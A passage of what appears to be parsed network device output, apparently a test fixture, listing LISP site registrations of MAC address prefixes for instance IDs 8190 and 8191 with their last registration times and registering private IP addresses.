"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"a86d.aaff.87af/48": {
"last_register": "00:35:07",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"aaf8.e8ff.94d6/48": {
"last_register": "00:14:37",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"aced.5cff.1dd7/48": {
"last_register": "01:16:19",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"b46b.fcff.a998/48": {
"last_register": "01:25:30",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"b808.cfff.ce97/48": {
"last_register": "01:51:25",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"b841.a4ff.827d/48": {
"last_register": "00:01:01",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"b863.4dff.a4f4/48": {
"last_register": "00:06:37",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"b8d7.afff.46a9/48": {
"last_register": "00:14:16",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"b8d7.afff.0fe0/48": {
"last_register": "00:00:53",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"b8d7.afff.e3fd/48": {
"last_register": "00:54:37",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"bc98.dfff.39e9/48": {
"last_register": "02:45:15",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"bca8.a6ff.326b/48": {
"last_register": "01:21:10",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"c6c5.1bff.f5a2/48": {
"last_register": "01:59:52",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"ca8e.82ff.6e1d/48": {
"last_register": "02:36:33",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"cc3d.82ff.41e0/48": {
"last_register": "00:26:58",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"ccc0.79ff.44d9/48": {
"last_register": "1d08h",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"d0a6.37ff.2224/48": {
"last_register": "00:39:04",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8190,
},
"d4ae.52ff.ae5e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"d4ae.52ff.3a85/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"d4d2.52ff.5294/48": {
"last_register": "03:14:13",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"d63d.a7ff.34aa/48": {
"last_register": "00:03:02",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"d81d.72ff.85e4/48": {
"last_register": "00:28:51",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"d8bb.2cff.b9db/48": {
"last_register": "00:01:21",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"dc08.0fff.47e4/48": {
"last_register": "00:02:47",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"dc37.14ff.1b32/48": {
"last_register": "00:00:14",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"dca9.04ff.66a2/48": {
"last_register": "01:11:33",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"dca9.04ff.7024/48": {
"last_register": "02:12:48",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"e04f.43ff.5854/48": {
"last_register": "4d04h",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"e04f.43ff.6efa/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"e201.8cff.57e0/48": {
"last_register": "00:31:03",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"e2e4.50ff.290b/48": {
"last_register": "00:10:11",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"e470.b8ff.bd26/48": {
"last_register": "01:29:27",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"e470.b8ff.97a8/48": {
"last_register": "01:02:32",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"e4b3.18ff.e93e/48": {
"last_register": "01:02:05",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"e86a.64ff.56fd/48": {
"last_register": "03:37:53",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"f018.98ff.d24c/48": {
"last_register": "01:29:41",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"f018.98ff.d664/48": {
"last_register": "02:06:54",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"f018.98ff.ea10/48": {
"last_register": "00:15:16",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"f018.98ff.6304/48": {
"last_register": "05:01:49",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"f018.98ff.ce4e/48": {
"last_register": "01:56:21",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"f018.98ff.a199/48": {
"last_register": "00:01:10",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"f2dc.88ff.3f09/48": {
"last_register": "00:02:17",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"f40e.01ff.df89/48": {
"last_register": "01:00:46",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"f493.9fff.aec0/48": {
"last_register": "1d16h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"f493.9fff.4765/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8190,
},
"f496.34ff.00d6/48": {
"last_register": "02:39:57",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"f859.71ff.bdb0/48": {
"last_register": "19:55:17",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"f8ff.c2ff.5f98/48": {
"last_register": "00:00:05",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"f8ff.c2ff.2830/48": {
"last_register": "02:34:03",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"f8ff.c2ff.123e/48": {
"last_register": "02:44:17",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"f8ff.c2ff.b2d6/48": {
"last_register": "00:19:56",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"fc4d.d4ff.9ba5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"fc4d.d4ff.25ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
}
},
},
8191: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8191,
},
"0000.0cff.94fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0002.b9ff.e707/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"0002.fdff.f596/48": {
"last_register": "05:41:20",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"0004.f2ff.c644/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0007.7dff.0fb1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"0007.7dff.11f6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"0008.32ff.b366/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"000b.abff.6eab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0015.f9ff.2a95/48": {
"last_register": "3d17h",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"0019.55ff.d54a/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.128.161:29272",
"inst_id": 8191,
},
"0023.33ff.3c9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0023.33ff.40a1/48": {
"last_register": "00:04:08",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0023.33ff.45d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0024.c4ff.ad75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"0025.84ff.782f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0027.90ff.05db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"0027.90ff.084b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0027.90ff.099e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0027.90ff.0c23/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"0027.90ff.3e99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"0027.90ff.48b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"0027.90ff.5c3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0027.90ff.61b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"0029.c2ff.862d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0038.dfff.64ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0045.1dff.7615/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0045.1dff.a630/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"0050.60ff.dc12/48": {
"last_register": "00:07:14",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.f272/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.0abe/48": {
"last_register": "1w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.a1e9/48": {
"last_register": "00:08:23",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.42ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0050.60ff.925f/48": {
"last_register": "00:07:15",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.9d91/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0050.60ff.a34d/48": {
"last_register": "19:20:02",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.a613/48": {
"last_register": "19:20:03",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.f6a0/48": {
"last_register": "19:20:02",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.3148/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0050.60ff.4288/48": {
"last_register": "19:20:02",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.ce2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.ce65/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.cfce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.cf65/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0057.d2ff.cf86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0057.d2ff.cfa1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0057.d2ff.530f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.55f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0057.d2ff.56fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.57bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.5bdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.5dda/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.5e3f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.5e66/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.5f08/48": {
"last_register": "12:48:17",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.5f20/48": {
"last_register": "1d13h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.5f74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.61c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.6157/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.6190/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.6256/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.633d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.6415/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.6433/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.66c4/48": {
"last_register": "09:27:42",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.66d3/48": {
"last_register": "06:18:05",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.6916/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.694c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.6f5b/48": {
"last_register": "00:38:37",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.72dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.7228/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.72be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.73ed/48": {
"last_register": "11:17:48",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.7312/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.768a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.92dd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.95e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.95ec/48": {
"last_register": "2d15h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.96c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.96dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.9682/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.975a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.979c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.98e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.98fe/48": {
"last_register": "04:24:07",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.9808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.99c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9973/48": {
"last_register": "22:13:48",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.998e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.99b2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9ae7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9af6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9afc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9a24/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"0057.d2ff.9a3f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9a51/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9a66/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9a81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9aba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9b41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.9b7a/48": {
"last_register": "07:00:12",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.9cdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9d4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.9e50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9f31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9f9d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.a0c3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.a252/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.a25b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.a6d2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.a966/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.20e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.21f8/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2102/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.211a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.213e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2144/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.214a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2159/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.215f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2162/48": {
"last_register": "02:10:46",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"0057.d2ff.21a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.21b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.22d6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.236f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2384/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.23b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2d53/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2e58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2e7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2e88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.2e9a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2ebe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.3005/48": {
"last_register": "03:46:32",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"0057.d2ff.341c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.161:29272",
"inst_id": 8191,
},
"0057.d2ff.3437/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.a04d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.aa71/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.aaa1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.af06/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.af45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b092/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.b0a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b0b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.b1d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b1e2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b1e5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b1e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b11f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b143/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b15e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b16d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b173/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b17c/48": {
"last_register": "2w1d",
"up": "yes#",
